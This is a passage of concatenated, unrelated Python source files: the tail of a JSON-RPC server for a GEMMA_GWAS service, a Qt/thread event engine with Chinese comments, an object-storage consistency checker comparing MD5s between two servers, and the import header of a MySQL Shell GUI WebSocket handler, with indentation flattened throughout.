err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'GEMMA_GWAS ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening on
# port 9999 by default, execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, start the server on localhost on a system-assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True.
This also allows the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
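# --- Illustrative sketch (not part of the original server code): running the
# test server in a child process so it can be stopped programmatically, as
# described in the start_server docstring above.
def _example_server_lifecycle():
    port = start_server(newprocess=True)        # system-assigned port is returned
    print("Test server is listening on port %s" % port)
    # ... issue JSON-RPC requests against the port here ...
    stop_server()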
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
eventEngine.py
|
# encoding: UTF-8
# Standard library modules
from Queue import Queue, Empty
from threading import Thread
from time import sleep
from collections import defaultdict
# Third-party modules
from qtpy.QtCore import QTimer
# Modules developed in this project
from .eventType import *
########################################################################
class EventEngine(object):
"""
Event-driven engine
All variables of the event-driven engine are private, to prevent their values
or state from being accidentally modified from the outside and causing bugs.
Variables
__queue: private, the event queue
__active: private, on/off switch of the event engine
__thread: private, the event processing thread
__timer: private, the timer
__handlers: private, dict of event handler functions
Methods
__run: private, main loop of the event processing thread
__process: private, processes an event by calling the listeners registered in the engine
__onTimer: private, puts a timer event into the event queue every time the timer fires
start: public, start the engine
stop: public, stop the engine
register: public, register a listener with the engine
unregister: public, unregister a listener from the engine
put: public, put a new event into the event queue
An event listener must be defined to take a single event object as its only argument, i.e.:
function
def func(event)
    ...
object method
def method(self, event)
    ...
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# Engine on/off switch
self.__active = False
# Event processing thread
self.__thread = Thread(target = self.__run)
# Timer used to trigger timer events
self.__timer = QTimer()
self.__timer.timeout.connect(self.__onTimer)
# __handlers is a dict that maps each event type to its handlers;
# the value for each key is a list of the functions listening to that event
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __onTimer(self):
"""向事件队列中存入计时器事件"""
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timer.start(1000)
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timer.stop()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class EventEngine2(object):
"""
计时器使用python线程的事件驱动引擎
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target = self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timerActive = True
self.__timer.start()
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
self.type_ = type_ # 事件类型
self.dict_ = {} # 字典用于保存具体的事件数据
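# Illustrative sketch (not part of the original module): how a consumer would
# typically register a handler for an application-defined event type and push
# events through the engine. EVENT_CUSTOM is a hypothetical type string; the
# real event type constants live in eventType.py. The function is only defined
# here, not called.
def demo_custom_event():
    EVENT_CUSTOM = 'eCustomDemo'            # hypothetical event type

    def onCustom(event):
        # event.dict_ carries whatever payload the producer attached
        print(u'received: {}'.format(event.dict_.get('data')))

    ee = EventEngine2()
    ee.register(EVENT_CUSTOM, onCustom)     # listen for this type only
    ee.start()

    event = Event(type_=EVENT_CUSTOM)
    event.dict_['data'] = 42
    ee.put(event)                           # onCustom runs on the engine thread

    sleep(1)
    ee.stop()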
#----------------------------------------------------------------------
def test():
"""测试函数"""
import sys
from datetime import datetime
from qtpy.QtCore import QCoreApplication
def simpletest(event):
        print(u'Handling the timer event triggered every second: {}'.format(str(datetime.now())))
app = QCoreApplication(sys.argv)
ee = EventEngine2()
#ee.register(EVENT_TIMER, simpletest)
ee.registerGeneralHandler(simpletest)
ee.start()
app.exec_()
# Run this script directly to test the engine
if __name__ == '__main__':
test()
|
checkData.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import obsPyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#Returns a list of (key, versionId) tuples parsed from the listing XML
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#If calMd5 is True, return the MD5 of the response body; otherwise return the body itself.
#Return None if the response indicates an error.
def make_request(obsRequesthandler, calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = obsRequesthandler.myHTTPConnection
obsRequest = obsRequesthandler.obsRequest
returnData = None
    #Use a random CHUNK_SIZE when the MD5 is being computed, otherwise use a fixed CHUNK_SIZE.
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(obsRequest.method, obsRequest.url, skip_host=1)
        #Send the HTTP header fields
for k in obsRequest.headers.keys():
myHTTPConnection.connection.putheader(k, obsRequest.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(obsRequest.requestType, localAddr, peerAddr, obsRequest.url, obsRequest.headers, obsRequest.sendContent[0:1024]))
myHTTPConnection.connection.send(obsRequest.sendContent)
waitResponseTimeStart = time.time()
        #Receive the response
        httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
        waitResponseTime = time.time() - waitResponseTimeStart
        logging.debug('get response, wait time %.3f' %waitResponseTime)
        #Read the response body
        contentLength = int(httpResponse.getheader('Content-Length', '-1'))
        logging.debug('get ContentLength: %d' %contentLength)
        #Successful GetObject responses need special handling (chunked reads); every other request reads the body in one call.
        #Range downloads have to be considered as well: any 2xx response counts as a normal request.
        recvBytes = 0
        if httpResponse.status < 300 and obsRequest.requestType == 'GetObject':
            #The data content is only verified when all of the following hold:
            #1. calMd5 is enabled; 2. the request is GetObject; 3. the response is 200 (206 is not hashed).
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
        #The request only counts as finished once the whole body has been read
        end_time = time.time()
        status = str(httpResponse.status) + ' ' + httpResponse.reason
        #Log at a level that depends on the status (<400: debug; >=400,<500: warn; >=500: error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(obsRequest.requestType, localAddr, peerAddr,obsRequest.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(obsRequest.requestType, localAddr, peerAddr,obsRequest.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(obsRequest.requestType, localAddr, peerAddr,obsRequest.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
            if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #mark external flow control
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
        #Some error responses do not include x-amz-request-id in the headers; get it from recvBody instead
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if obsRequest.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, obsRequest.requestType, localAddr, peerAddr, obsRequest.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(obsRequest.bucket, obsRequest.key, stack)
finally:
if not end_time: end_time = time.time()
        #Close the connection: 1. honour the server semantics and close if "connection: close" was returned.
        if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
            #Close so that subsequent requests open a new connection.
            logging.info('server inform to close connection')
            myHTTPConnection.closeConnection()
        #2. Close on connection-level errors detected by the client.
        elif not status <= '600':
            logging.warning('caught exception, close connection')
            #Most likely a network error; close so that subsequent requests open a new connection.
            myHTTPConnection.closeConnection()
            time.sleep(.1)
        #3. The client is configured to use short-lived connections.
        elif not myHTTPConnection.longConnection:
            #Python below 2.7 has a bug: closing with close() directly leaves the client socket in CLOSE_WAIT.
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
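# Illustrative sketch (not part of the original tool): the chunked hashing
# pattern used by make_request() for GetObject bodies, shown on a plain
# file-like object. Reading bounded chunks keeps memory usage flat regardless
# of the object size, and the resulting digest is identical to hashing the
# whole body in one call.
def md5_of_stream(stream, chunk_size=65536):
    fileHash = hashlib.md5()
    while True:
        data = stream.read(chunk_size)
        if not data:
            break
        fileHash.update(data)
    return fileHash.hexdigest()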
if __name__ == '__main__':
    # MD5_Global is filled in by the make_request() worker thread
    printResult = time.time()
    Service_1= '100.61.5.3'
    Service_2 = '100.61.5.13'
    #Multiple users' AK,SK pairs can be listed here
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = obsPyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = obsPyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
        #List all of the user's buckets
obsRequest = obsPyCmd.OBSRequestDescriptor(requestType ='ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
obsRequesthandler1 = obsPyCmd.OBSRequestHandler(obsRequest, server1_conn)
Buckets_1 = make_request(obsRequesthandler1)
obsRequesthandler2 = obsPyCmd.OBSRequestHandler(obsRequest, server2_conn)
Buckets_2 = make_request(obsRequesthandler2)
        #Compare whether the bucket lists match
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
        #Iterate over the buckets
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
obsRequest = obsPyCmd.OBSRequestDescriptor(requestType ='ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
obsRequest.queryArgs['max-keys'] = '999'
obsRequest.queryArgs['versions'] = None
obsRequest.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: obsRequest.queryArgs['key-marker'] = k_marker1
if v_marker1: obsRequest.queryArgs['version-id-marker'] = v_marker1
obsRequesthandler1 = obsPyCmd.OBSRequestHandler(obsRequest, server1_conn)
Objects_1 = make_request(obsRequesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: obsRequest.queryArgs['key-marker'] = k_marker2
if v_marker2: obsRequest.queryArgs['version-id-marker'] = v_marker2
obsRequesthandler2 = obsPyCmd.OBSRequestHandler(obsRequest, server2_conn)
Objects_2 = make_request(obsRequesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
                #Objects present in both listings
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
                #Verify each common object
for obj in Obj12:
                    #Read the object from both servers
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
obsRequest_getobj = obsPyCmd.OBSRequestDescriptor(requestType ='GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
obsRequest_getobj.bucket = bucket
obsRequest_getobj.key = obj[0]
if obj[1]: obsRequest_getobj.queryArgs['versionId'] = obj[1]
obsRequesthandler1 = obsPyCmd.OBSRequestHandler(obsRequest_getobj, server1_conn)
obsRequesthandler2 = obsPyCmd.OBSRequestHandler(obsRequest_getobj, server2_conn)
t1 = threading.Thread(target=make_request, name='thread1', args=(obsRequesthandler1, True, True))
t1.start();
md5_2 = make_request(obsRequesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
                #Remove the objects common to both lists
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
                #If the lists differ by more than 10000 objects, skip this bucket
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
|
ShellGuiWebSocketHandler.py
|
# Copyright (c) 2020, 2022, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0,
# as published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms, as
# designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an additional
# permission to link the program and your derivative works with the
# separately licensed software that they have included with MySQL.
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gui_plugin as gui
import threading
import uuid
import datetime
import json
import re
import hashlib
import base64
import inspect
from gui_plugin.core.HTTPWebSocketsHandler import HTTPWebSocketsHandler
from gui_plugin.core.Db import GuiBackendDb
from gui_plugin.core.Protocols import Response
import gui_plugin.core.Logger as logger
import gui_plugin.core.WebSocketCommon as WebSocket
from gui_plugin.core.modules.ModuleSession import ModuleSession
import mysqlsh
from contextlib import contextmanager
from gui_plugin.users import backend as user_handler
from gui_plugin.users.backend import get_id_personal_user_group
from queue import Queue, Empty
